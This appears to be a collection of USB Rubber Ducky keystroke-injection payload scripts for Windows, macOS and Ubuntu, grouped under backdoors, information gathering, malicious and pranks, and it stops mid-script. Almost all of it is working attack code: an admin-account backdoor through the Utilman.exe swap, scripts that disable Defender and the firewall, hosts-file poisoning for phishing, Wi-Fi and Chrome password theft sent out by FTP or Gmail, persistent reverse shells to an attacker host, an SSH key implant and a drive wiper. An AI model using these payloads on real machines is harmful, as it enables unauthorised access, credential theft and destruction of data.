STRING icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T
ENTER
DELAY 50
STRING cd %systemroot%\System32
ENTER
DELAY 50
STRING mkdir util
ENTER
STRING xcopy cmd.exe util\
ENTER
DELAY 50
STRING ren Utilman.exe Utilman.exe.bak
ENTER
STRING cd util
ENTER
DELAY 50
STRING ren cmd.exe Utilman.exe
ENTER
DELAY 50
STRING cd ..
ENTER
DELAY 50
STRING xcopy util/Utilman.exe \
ENTER
DELAY 50
STRING rmdir /s /q util
ENTER
DELAY 50
STRING exit
ENTER
DELAY 50
GUI u
STRING net user Local000 /add
ENTER
DELAY 50
STRING net localgroup administrators Local000 /add
ENTER
DELAY 50
STRING exit
ENTER
DELAY 50
GUI r
STRING cmd
ENTER
DELAY 50
STRING cd "%systemroot%\System32"
ENTER
DELAY 50
STRING delete Utilman.exe
ENTER
DELAY 50
STRING y
ENTER
DELAY 50
STRING ren Utilman.exe.bak Utilman.exe
ENTER
DELAY 50
STRING exit
ENTER
GUI
STRING cmd
MENU
STRING a
ENTER
DELAY 50
LEFT
ENTER
DELAY 200
STRING net user Local000 *
ENTER
STRING hak5
ENTER
STRING hak5
ENTER
STRING exit
ENTER

Disable Windows Defender (Windows)

REM turn off windows defender then clear action center
REM You take responsibility for any laws you break with this, I simply point out the security flaw
REM
REM start of script
REM
REM let the HID enumerate
DELAY 2000
ESCAPE
DELAY 100
CONTROL ESCAPE
DELAY 100
STRING Windows Defender Settings
ENTER
DELAY 2000
REM why TAB and HOME?
TAB
DELAY 50
REM why TAB and HOME?HOME
DELAY 50
ALT F4
DELAY 3200
REM windows + a = ????
GUI a
DELAY 500
ENTER
DELAY 100
GUI a

Wifi backdoor (Windows)

Open a CMD bypassing UAC then create a wireless access point with the SSID noobcake and WPA key 12345678, then lower firewall.

CONTROL ESCAPE
DELAY 200
STRING cmd
DELAY 200
MENU
DELAY 100
STRING a
DELAY 100
LEFTARROW
ENTER
DELAY 200
STRING netsh wlan set hostednetwork mode=allow ssid=noobcake key=12345678
ENTER
DELAY 100
STRING netsh wlan start hostednetwork
ENTER
DELAY 100
STRING netsh firewall set opmode disable
ENTER
STRING exit
ENTER

Wifun (Windows)

This script will enter the command shell as administrator, disable the firewall and export the wifi settings then send to an ftp server of your choice. the cool part is that the security is exported in clear text. After sending the file it will delete the exports from the sending directory and restore the firewall.

DELAY 2000
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
CTRL-SHIFT ENTER
DELAY 400
STRING netsh firewall set opmode mode=disable
ENTER
DELAY 400
STRING netsh wlan export profile key=clear
ENTER
DELAY 400
STRING cd %USERPROFILE%
ENTER
DELAY 400
STRING ftp -i ftp server
ENTER
DELAY 400
STRING username
ENTER
DELAY 400
STRING password
ENTER
DELAY 600
STRING prompt
ENTER
DELAY 400
STRING prompt
ENTER
DELAY 400
STRING MPUT *.xml
ENTER
DELAY 4000
STRING bye
ENTER
DELAY 400
STRING del *.xml
ENTER
DELAY 200
STRING netsh firewall set opmode mode=enable
ENTER
DELAY 400
ALT SPACE
STRING c

Create wireless (auto-connect) network association (Windows)

DEFAULT_DELAY 200
ESC
ESC
REM opens task manager for a distraction
REM tell user you are checking memory or somthing
GUI r
STRING taskmgr
ENTER
ALT SPACE
STRING X
TAB
TAB
TAB
TAB
LEFT
LEFT
REM opens network manager
CTRL ESC
STRING Manage Wireless Networks
ENTER
TAB
TAB
TAB
TAB
ENTER
ENTER
REM creates ap association
STRING I_Love_Pineapples
TAB
DOWN
TAB
SPACE
TAB
SPACE
ENTER
ESC
ALT F4
CTRL ESC
REM reboots for autoconnect to pineapple
GUI r
STRING Shutdown.exe -r -t 00
ENTER

MissDirection

Payload will edit the hosts file to allow you to redirect web pages where you would like the user to go.

DELAY 2000
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
CTRL-SHIFT ENTER
DELAY 400
STRING cd C:\Windows\System32\drivers\etc\
ENTER
DELAY 400
STRING echo 64.149.122.94 www.test.com>>hosts
ENTER
DELAY 400
ALT SPACE
STRING c

Local DNS poisoning (Windows)

GUI r
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
DELAY 50
STRING ECHO. >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
DELAY 50
ENTER
DELAY 50
STRING ECHO 10.0.0.1 ADMIN.COM >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
DELAY 50
ENTER
STRING exit
ENTER

Local DNS poisoning (OSX)

REM A script to create a local DNS entry in the host file of a mac.
REM change the example.com to any site you want.
REM change the 127.0.0.1 to any ip you want.
DELAY 1000
STRING mount -uw /
ENTER
DELAY 2000
ENTER
STRING nano /private/etc/hosts
ENTER
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
STRING 127.0.0.1 example.com
ENTER
STRING 127.0.0.1 www.example.com
ENTER
CTRL o
ENTER
CTRL x
STRING shutdown -h now

Phisher (Windows)

Used for phishing, it add’s an ip of your choosing to the hosts file on windows so when the user types into web browser for example www.facebook.com, instead of going to the proper ip it goes to the ip in the host file.

REM ---[Start CMD as administrator]-----------------------
GUI
DELAY 50
STRING cmd
DELAY 150
MENU
DELAY 75
STRING a
ENTER
DELAY 200
LEFT
ENTER
STRING cls
ENTER
REM ---[END]----------------------------------------------
DELAY 300
REM ---[Inject into the host file]------------------------
STRING copy con inject.bat
ENTER
STRING SET NEWLINE=^& echo.
ENTER
ENTER
STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
ENTER
ENTER
STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts
ENTER
STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts
ENTER
CONTROL z
ENTER
STRING inject.bat
ENTER
REM ---[END]----------------------------------------------
DELAY 200
STRING exit
ENTER

Remotely Possible (Windows)

Script for turning off the firewall, adding a user, making it an administrator, enabling remote access and sending (by FTP) the IP number to a server of your choice, then deleting the file.

DELAY 2000
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
CTRL-SHIFT ENTER
DELAY 400
STRING netsh firewall set opmode mode=disable
ENTER
DELAY 400
STRING ALT y
ENTER
DELAY 400
STRING net user /add username password
ENTER
DELAY 400
STRING net localgroup administrators username /add
ENTER
DELAY 400
STRING reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t
REG_DWORD /d 0x1 /f
ENTER
DELAY 400
STRING reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t
REG_DWORD /d 0x0 /f
ENTER
DELAY 400
STRING sc config TermService start= auto
ENTER
DELAY 400
STRING net start Termservice
ENTER
DELAY 400
STRING cd %USERPROFILE%
ENTER
DELAY 400
STRING ipconfig /all > number.txt
ENTER
DELAY 400
STRING ftp -i ftp server
ENTER
DELAY 400
STRING login name
ENTER
DELAY 400
STRING login password
ENTER
DELAY 600
STRING prompt
ENTER
DELAY 400
STRING prompt
ENTER
DELAY 400
STRING PUT number.txt
ENTER
DELAY 2000
STRING bye
ENTER
DELAY 400
STRING del number.txt
ENTER
DELAY 400
ALT SPACE
STRING c

Root backdoor (OSX)

REM A simple script for rooting OSX from single user mode.
REM Change mysite.com to your domain name or IP address
REM Change 1337 to your port number
REM Catch the shell with 'nc -l -p 1337'
REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
DELAY 1000
STRING mount -uw /
ENTER
DELAY 2000
STRING mkdir /Library/.hidden
ENTER
DELAY 200
STRING echo '#!/bin/bash
ENTER
STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1
ENTER
STRING wait' > /Library/.hidden/connect.sh
ENTER
DELAY 500
STRING chmod +x /Library/.hidden/connect.sh
ENTER
DELAY 200
STRING mkdir /Library/LaunchDaemons
ENTER
DELAY 200
STRING echo '<plist version="1.0">
ENTER
STRING <dict>
ENTER
STRING <key>Label</key>
ENTER
STRING <string>com.apples.services</string>
ENTER
STRING <key>ProgramArguments</key>
ENTER
STRING <array>
ENTER
STRING <string>/bin/sh</string>
ENTER
STRING <string>/Library/.hidden/connect.sh</string>
ENTER
STRING </array>
ENTER
STRING <key>RunAtLoad</key>
ENTER
STRING <true/>
ENTER
STRING <key>StartInterval</key>
ENTER
STRING <integer>60</integer>
ENTER
STRING <key>AbandonProcessGroup</key>
ENTER
STRING <true/>
ENTER
STRING </dict>
ENTER
STRING </plist>' > /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 500
STRING chmod 600 /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 200
STRING launchctl load /Library/LaunchDaemons/com.apples.services.plist
ENTER
DELAY 1000
STRING shutdown -h now
ENTER

Catch the shell with netcat:

nc -l -p 1337

User backdoor (OSX)

REM A simple script for creating a persistent backdoor on OSX.
REM Change mysite.com to your domain name or IP address
REM Change 1337 to your port number
REM Catch the shell with 'nc -l -p 1337'
REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
DELAY 1000
GUI SPACE
STRING terminal
DELAY 500
ENTER
DELAY 500
STRING mkdir ~/Library/.hidden
ENTER
DELAY 200
STRING echo '#!/bin/bash
ENTER
STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1
ENTER
STRING wait' > ~/Library/.hidden/connect.sh
ENTER
DELAY 500
STRING chmod +x ~/Library/.hidden/connect.sh
ENTER
DELAY 200
STRING mkdir ~/Library/LaunchAgents
ENTER
DELAY 200
STRING echo '<plist version="1.0">
ENTER
STRING <dict>
ENTER
STRING <key>Label</key>
ENTER
STRING <string>com.apples.services</string>
ENTER
STRING <key>ProgramArguments</key>
ENTER
STRING <array>
ENTER
STRING <string>/bin/sh</string>
ENTER
STRING <string>'$HOME'/Library/.hidden/connect.sh</string>
ENTER
STRING </array>
ENTER
STRING <key>RunAtLoad</key>
ENTER
STRING <true/>
ENTER
STRING <key>StartInterval</key>
ENTER
STRING <integer>60</integer>
ENTER
STRING <key>AbandonProcessGroup</key>
ENTER
STRING <true/>
ENTER
STRING </dict>
ENTER
STRING </plist>' > ~/Library/LaunchAgents/com.apples.services.plist
ENTER
DELAY 200
STRING chmod 600 ~/Library/LaunchAgents/com.apples.services.plist
ENTER
DELAY 200
STRING launchctl load ~/Library/LaunchAgents/com.apples.services.plist
ENTER
DELAY 200
GUI q

Catch the shell with netcat:

nc -l -p 1337

Passwordless SSH access (OSX)

Replace RSA_PUB_ID with your SSH Public Key.

REM This script adds a ssh public key to the authorized_keys file on a target's mac.
DELAY 1000
COMMAND SPACE
DELAY 500
STRING Terminal
DELAY 500
ENTER
DELAY 800
STRING echo 'RSA_PUB_ID' >> ~/.ssh/authorized_keys
ENTER
DELAY 1000
STRING killall Terminal
ENTER
REM Note: you may shorten the times if you think they are too slow.  I made them to accomodate older macs that can't get around very fast.

Information Gathering

Chrome password stealer (Windows)

Google Chrome Version 36.0.1985.143 and below: Any version above is patched and requires user password.

REM Target: Windows 7
REM Description: Opens chrome, navigates to chrome settings, navigates to saved passwords, searches for facebook, shows password, copys password
REM closes chrome, Opens notepad with bypass uac so it can save to C:\ drive and pastes in password
REM saves to C:\passwords.txt folder, closes notepad
REM sends files via gmail to account.
DELAY 2000
REM -------------open chrome
GUI r
DELAY 1000
STRING chrome
DELAY 1000
ENTER
DELAY 4000
REM -------------copy plaintext password
STRING chrome://settings/passwords
ENTER
DELAY 2000
STRING facebook
DELAY 500
TAB
DELAY 500
DOWN
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
ENTER
DELAY 500
ALT D
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
TAB
DELAY 500
CTRL C
DELAY 500
ALT F4
DELAY 500
REM -------------save file to music folder as passwords.txt
GUI R
DELAY 500
STRING powershell start-process notepad.exe -Verb runAs
DELAY 500
ENTER
DELAY 2000
ALT y
DELAY 1000
CTRL V
DELAY 500
ALT f
DELAY 500
STRING s
DELAY 500
STRING passwords.txt
DELAY 500
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
STRING c
DELAY 1000
STRING l
DELAY 500
ENTER
DELAY 500
ALT S
DELAY 1000
ALT F4
DELAY 500
REM -------------email log via gmail
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 1000
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('youremail@gmail.com', 'password');
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = 'youremail@gmail.com'
ENTER
STRING $ReportEmail.To.Add('toemail@gmail.com')
ENTER
STRING $ReportEmail.Subject = 'Ducky chrome passwords'
ENTER
STRING $ReportEmail.Body = 'Attached is your list of passwords.'
ENTER
STRING $ReportEmail.Attachments.Add('c:\passwords.txt')
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
DELAY 3000
STRING exit
ENTER

Wifi password grabber (Windows)

Saves the SSID, Network type, Authentication and the password to Log.txt and emails the contents of Log.txt from a gmail account. Change the following things;

DELAY 3000
REM --> Minimize all windows
WINDOWS d
REM --> Open cmd
WINDOWS r
DELAY 500
STRING cmd
ENTER
DELAY 1000
REM --> Getting SSID
STRING cd "%USERPROFILE%\Desktop" & for /f "tokens=2 delims=: " %A in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "BSSID"') do set A=%A
ENTER
REM --> Creating A.txt
STRING netsh wlan show profiles %A% key=clear | findstr /c:"Network type" /c:"Authentication" /c:"Key Content" | findstr /v "broadcast" | findstr /v "Radio">>A.txt
ENTER
REM --> Get network type
STRING for /f "tokens=3 delims=: " %A in ('findstr "Network type" A.txt') do set B=%A
ENTER
REM --> Get authentication
STRING for /f "tokens=2 delims=: " %A in ('findstr "Authentication" A.txt') do set C=%A
ENTER
REM --> Get password
STRING for /f "tokens=3 delims=: " %A in ('findstr "Key Content" A.txt') do set D=%A
ENTER
REM --> Delete A.txt
STRING del A.txt
ENTER
REM --> Create Log.txt
STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt
ENTER
REM --> Mail Log.txt
STRING powershell
ENTER
STRING $SMTPServer = 'smtp.gmail.com'
ENTER
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
ENTER
STRING $SMTPInfo.EnableSsl = $true
ENTER
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('ACCOUNT@gmail.com', 'PASSWORD')
ENTER
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
ENTER
STRING $ReportEmail.From = 'ACCOUNT@gmail.com'
ENTER
STRING $ReportEmail.To.Add('RECEIVER@gmail.com')
ENTER
STRING $ReportEmail.Subject = 'WiFi key grabber'
ENTER
STRING $ReportEmail.Body = (Get-Content Log.txt | out-string)
ENTER
STRING $SMTPInfo.Send($ReportEmail)
ENTER
STRING exit
ENTER
REM --> Delete Log.txt and exit
STRING del Log.txt & exit
ENTER

Suggestions

Information gathering (Ubuntu)

The following script is an information gatherer script which collects info from a running Ubuntu OS and saves it to a file named “info_gathering.txt”. The info that the script retrieves is the logged in username, the distribution and kernel version of the running system, the applicability of the shellsock bug, the mounted filesystems, information which is related to the Network adapters, availability of development tools (python, g++), contents of the hosts file and the listening TCP/UDP connections. Apart from that it attempts to find readable folders inside the /etc folder and also prints the SUID and GUID files.

REM Info gathering Ubuntu 1.0 Script issues OS info gathering commands in terminal - by Captain_Harlock, Improved by Thecakeisgit ;D
DELAY 3000
CTRL ALT t
DELAY 1500
STRING clear
DELAY 10
ENTER
DELAY 50
STRING echo "Logged in user: " $USER > info_gathering.txt
ENTER
DELAY 50
STRING echo >> info_gathering.txt
DELAY 50
ENTER
DELAY 50
STRING echo -n "Distribution Kernel Version: " >> info_gathering.txt
DELAY 50
ENTER
DELAY 50
STRING cat /etc/issue | cut -c1-13 >> info_gathering.txt
DELAY 50
ENTER
DELAY 50
STRING echo -n "uname results: " >> info_gathering.txt
DELAY 50
ENTER
DELAY 50
STRING uname -a >> info_gathering.txt
DELAY 50
ENTER
DELAY 100
STRING echo >> info_gathering.txt
DELAY 50
ENTER
DELAY 50
STRING echo "Shellsock Bug Vulnerability: " >> info_gathering.txt
DELAY 50
ENTER
DELAY 50
STRING env x='() { :;}; echo vulnerable' bash -c "echo this is a test" >> info_gathering.txt
DELAY 50
ENTER
DELAY 50
STRING echo >> info_gathering.txt
DELAY 50
ENTER
DELAY 50
STRING echo >> info_gathering.txt
DELAY 50
ENTER
DELAY 50
STRING echo "Mounted filesystems: " >> info_gathering.txt
ENTER
DELAY 50
STRING mount -l >> info_gathering.txt
DELAY 50
ENTER
DELAY 100
STRING echo >> info_gathering.txt
ENTER
DELAY 50
STRING echo "Network Configuration: " >> info_gathering.txt
DELAY 50
ENTER
DELAY 50
STRING ifconfig -a | grep 'Link\|inet' >> info_gathering.txt
ENTER
DELAY 50
STRING echo >> info_gathering.txt
ENTER
DELAY 50
STRING echo "Print Hosts: " >> info_gathering.txt
ENTER
DELAY 50
STRING cat /etc/hosts >> info_gathering.txt
ENTER
DELAY 50
STRING echo "Print ARP: " >> info_gathering.txt
ENTER
DELAY 50
STRING arp >> info_gathering.txt
ENTER
DELAY 50
STRING echo >> info_gathering.txt
ENTER
DELAY 50
STRING echo "Development tools availability: " >> info_gathering.txt
ENTER
DELAY 50
STRING which gcc >> info_gathering.txt
ENTER
DELAY 50
STRING which g++ >> info_gathering.txt
ENTER
DELAY 50
STRING which python >> info_gathering.txt
ENTER
DELAY 50
STRING echo >> info_gathering.txt
ENTER
DELAY 50
STRING echo "Print TCP/UDP Listening Services: " >> info_gathering.txt
ENTER
DELAY 50
STRING netstat -tunlpe >> info_gathering.txt
ENTER
DELAY 300
STRING echo >> info_gathering.txt
ENTER
DELAY 50
STRING echo "Installed Packages: " >> info_gathering.txt
DELAY 50
ENTER
DELAY 200
STRING dpkg -l >> info_gathering.txt
ENTER
DELAY 300
STRING echo >> info_gathering.txt
ENTER
DELAY 50
STRING echo "Find Readable Folders in /etc: " >> info_gathering.txt
ENTER
DELAY 50
STRING find /etc -user $(id -u) -perm -u=r -o -group $(id -g) -perm -g=r -o -perm -o=r -ls 2> /dev/null >> info_gathering.txt
ENTER
DELAY 500
STRING echo >> info_gathering.txt
ENTER
DELAY 50
STRING echo "Find SUID and GUID files" >> info_gathering.txt
ENTER
DELAY 50
STRING find / -type f -perm -u=s -o -type f -perm -g=s -ls  2> /dev/null >> info_gathering.txt
DELAY 50
ENTER
DELAY 15000
STRING history -c
DELAY 50
ENTER
DELAY 50
STRING exit
DELAY 50
ENTER

Internet Protocol Slurp (OSX)

This payload quickly copies down information gathered from terminal’s command ifconfig and pastes it in a file called “default_config” (So there is no suspicion) in the Documents folder. This payload also quickly cleans up after itself allowing for a 10 second stealth slurp. If need be you may change the command “ifconfig” to any other command such as “ls” or others.

DELAY 1000
GUI SPACE
DELAY 100
STRING terminal
DELAY 100
ENTER
DELAY 1000
STRING ifconfig
ENTER
DELAY 250
GUI A
DELAY 100
GUI C
DELAY 100
GUI Q
DELAY 100
GUI SPACE
DELAY 100
STRING textedit
DELAY 100
ENTER
DELAY 1000
GUI A
DELAY 100
GUI V
DELAY 100
GUI Q
DELAY 500
STRING default_config
ENTER

iMessage Capture (OSX)

REM This script captures iMessages and puts it into
REM a folder named automatically to the victims username
DELAY 500
GUI SPACE
DELAY 150
STRING Terminal
ENTER
DELAY 300
STRING cp -r ~/Library/Messages/Archive /Volumes/RubberDucky/$USER/
ENTER
STRING history -c
ENTER
STRING diskutil umount /Volumes/RubberDucky
ENTER
DELAY 500
STRING history -c
ENTER
STRING echo 5A13X99
ENTER
DELAY 1000
STRING exit
ENTER
DELAY 250
GUI q

Malicious

Auto defacer (Apache)

Saves old index file as index.bak, then writes a new one detailing the extensiveness of the hack that has been performed against them.

NOTE: Originally this script had a DEFAULT_DELAY value of 200. Since this value did not fit into a Java byte (Java bytes are signed) it had no effect on the final script. It has been removed.

REM Auto Defacer for Ubuntu Based Machines running Apache.
REM Description: Automatically defaces index page of an apache web server.
DEFAULT_DELAY 200
ALT F2
STRING terminal
ENTER
STRING cd /var/www
ENTER
STRING mv index.* index.bak
ENTER
STRING touch index.html
ENTER
STRING nano index.html
ENTER
STRING <marquee>You have been hacked by the USB Rubber Ducky!</marquee>
ENTER
STRING <center><a href="http://www.usbrubberducky.com/"><img src="http://cdn.shopify.com/s/files/1/0068/2142/products/usbducky2.jpg" /></a><center>
ENTER
STRING <center><h5>Your old index page can be found <a href="./index.bak">here.</a></h5></center>
CONTROL x
STRING y
ENTER
STRING exit
ENTER

Batch wiper drive eraser (Windows)

This script will erase attached drives on your computer. Made in to demonstrate batch wiper malware. Features a registry key that will restart the script on reboot, aswell as a vb script that will allow the batch file to run silently on vista and Windows 7 machines.

REM PURPOSE: to delete the contents of attached drives.
GUI r
STRING cmd /Q /D /T:7F /F:OFF /V:OFF /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM THE DIRECTORY YOU WANT TO HIDE THE SCRIPT IN
STRING cd %TEMP%
ENTER
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL z
ENTER
REM Delete batch file if already exists
STRING erase /Q SecurityBullseye.bat
ENTER
REM Make the batch file
REM SLIGHT THROWBACK TO VIDEO GAME BIOSHOCK I/II
STRING copy con SecurityBullseye.bat
ENTER
REM REGISTRY KEY RESTARTS THE SCRIPT ON REBOOT
STRING REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Persistence /t REG_SZ /d "wscript.exe %TEMP%\invis.vbs %TEMP%\SecurityBullseye.bat" /f
ENTER
STRING :while1
ENTER
REM C:\ IS USUALLY THE DRIVE THE OS IS INSTALLED ON, SO OMIT.
STRING for %%a in (A B D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
ENTER
STRING IF EXIST %%a:\ erase /Q /S /F "%%a:\*.*"
ENTER
STRING IF EXIST %%a:\ rmdir /Q /S "%%a:\*"
ENTER
STRING )
ENTER
STRING timeout /t 60
ENTER
STRING goto :while1
ENTER
CONTROL z
ENTER
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs SecurityBullseye.bat
ENTER
STRING EXIT
ENTER

Deny net access (Windows)

Still needs some work to get it to start up silently on restart.

REM A new DenyNetAccess program that employs window hiding techniques.
CONTROL ESCAPE
STRING cmd /Q /D /T:7F /F:OFF /V:OFF /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
REM A Different directory in case the second one is inaccessable
DELAY 750
STRING cd %userprofile%\Downloads\
ENTER
STRING cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
ENTER
REM Delete batch file if already exists
STRING erase /Q a.bat
ENTER
REM Make the batch file
STRING copy con a.bat
ENTER
STRING @echo off
ENTER
STRING :Start
ENTER
REM Release Networking INformation
STRING ipconfig /release
ENTER
REM 2 Generic Browsers
STRING taskkill /f /im "iexplore.exe"
ENTER
STRING taskkill /f /im "firefox.exe"
ENTER
REM Microsoft Visual Studio 2010
STRING taskkill /f /im "devenv.exe"
ENTER
STRING timeout /t 60
ENTER
STRING Goto Start
ENTER
CONTROL z
ENTER
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
STRING copy con invis.vbs
ENTER
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
ENTER
CONTROL z
ENTER
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs a.bat
ENTER
REM Close the cmd prompt.
STRING EXIT
ENTER

Website Lock (Windows)

REM Title: Website Lock
REM Author: Audiack
REM Target Ducky Encoder: 2.6.2
REM Target OS: Windows 7 (32 and 64 bit), maybe older/newer windows versions. Haven't tested it on any other than 7.
REM Description: Plays off of Aprizm's script to open a website, but it also disables the mouse and keyboard so the user can't leave the website.
REM Info:
REM     The user can easily unplug and re-plug in the keyboard/mouse to reinstall the drivers get them working again.
REM     This requires the user to plug a USB drive in BEFORE the ducky is plugged in.
REM     The files are here: https://www.dropbox.com/sh/i09leu4kcifta6a/AACEFYQnlOIUsDtLLrQuemCha?dl=0.
REM     Make sure the files are in the root of a drive called DUCKY.
REM     Twin duck works well with this. It is what I used when I was testing it.
REM File Descriptions:
REM     The devcon32 & devcon64 are the files used to uninstall the keyboard and mouse drivers (for the two architectures).
REM     The invisible.vbs is used to run the batch script invisibly after the video is in fullscreen.
REM     The TheRealAnnoyance.bat is the batch script run in the background that disables their mouse & keyboard.
REM     The WebsiteLink.txt contains the website link. The user can change this as desired. Make sure there are no spaces and there is only a single link.
REM     If you are going to modify the website link as a youtube video, it needs to be in this format: https://www.youtube.com/embed/sCNrK-n68CM?rel=0&autoplay=1&loop=1
REM     Find the youtube video you want, then take the part after watch?v= and put it in place of sCNrK-n68CM in the above link.
DELAY 3000
CTRL ESC
DELAY 700
STRING cmd
CTRL-SHIFT ENTER
DELAY 3000
ALT Y
DELAY 700

STRING for /f %d in ('wmic.exe volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d
ENTER
DELAY 1200
STRING cd /d %myd%
ENTER

DELAY 1000
STRING type "WebsiteLink.txt" | clip
ENTER
DELAY 100
STRING C:/windows/System32/wscript.exe invisible.vbs TheRealAnnoyance.bat
ENTER
DELAY 400
REM Aprizm's code for youtube roller begins here. I changed the link to a ctrl-v so that the ducky pastes the contents of WebsiteLink.txt hence the above line of code: 'type "WebsiteLink.txt" | clip'
REM Title: Youtube Roller
REM Author: Aprizm
REM Description: This scripts opens a youtube video in fullscreen and puts the browser in fullscreen
REM Option : if you change the link of the video dont forget to change the watch with watch_popup to have it fullscreen also add &loop=1 at the end to make it loop forever
DELAY 200
GUI r
DELAY 200
CTRL V
ENTER
DELAY 1000
F11

Pranks

Ugly rolled (Windows)

REM payload creats a vbs script that is run to make a YouveBeenUglyRolled.lnk to IE in the users start-up folder
REM IE is set to run in kiosk mode "-K" and links to youtube with a very annoying lady gaga with jim carrey's face video
REM note if running in 64 bit windows, you may need to change %programfiles% with %programfiles(x86)% flash player 64 bit may not be installed!
ESCAPE
GUI r
DELAY 120
STRING cmd.exe
ENTER
DELAY 325
STRING copy con YouveBeenUglyRolled.vbs
ENTER
STRING Set WshShell = WScript.CreateObject("WScript.Shell"):
STRING StrMyStartUp = WshShell.SpecialFolders("Startup"):
STRING Set lnk = WshShell.CreateShortcut(StrMyStartUp + "\YouveBeenUglyRolled.lnk"):
ENTER
STRING lnk.TargetPath = "%programfiles%\Internet Explorer\iexplore.exe":
REM place any link here, this one is a very annoying lady gaga with jim carrey's face
REM the -K option makes IE run in kiosk mode
STRING lnk.Arguments = "-K http://www.youtube.com/v/XYYo3T6nCw8?autoplay=1":
REM also try http://www.youtube.com/v/9WZGyzz5O-U?autoplay=1 for katy perry rip, or
REM http://www.youtube.com/v/HqGsT6VM8Vg?autoplay=1 for scary car video
STRING lnk.Save
ENTER
CTRL z
ENTER
STRING YouveBeenUglyRolled.vbs
ENTER
DELAY 200
STRING DEL YouveBeenUglyRolled.vbs
ENTER
STRING EXIT
ENTER

Wallpaper (Windows7)

Minimizes all windows to desktop, takes screenshot, disables desktop icons, saves screenshot in %userprofile% and sets as wallpaper

GUI d
DELAY 500
PRINTSCREEN
DELAY 100
MENU
DELAY 300
STRING V
DELAY 40
STRING D
DELAY 300
GUI r
DELAY 700
STRING mspaint
ENTER
DELAY 1200
CTRL v
DELAY 500
CTRL s
DELAY 1000
STRING %userprofile%\a.bmp
ENTER
DELAY 500
ALT f
DELAY 400
STRING K
DELAY 100
STRING F
DELAY 1000
ALT F4
DELAY 300
GUI d

Same thing but better?

DELAY 10000
GUI d
DELAY 100
PRINTSCREEN
DELAY 100
MENU
DELAY 70
STRING h
DELAY 50
STRING b
DELAY 50
GUI r
DELAY 200
STRING mspaint
ENTER
DELAY 500
CTRL v
DELAY 300
ALT f
DELAY 300
STRING b
DELAY 300
ENTER
DELAY 300
STRING a1z2.png
ENTER
ALT F4
DELAY 300
GUI d

Paint Hack (Windows)

CONTROL ESCAPE
DELAY 200
STRING mspaint
ENTER
DELAY 1000
CTRL e
STRING 6
TAB
STRING 1
ENTER
CTRL PAGEUP
REPEAT 5
REM ****FIRST COLOR****
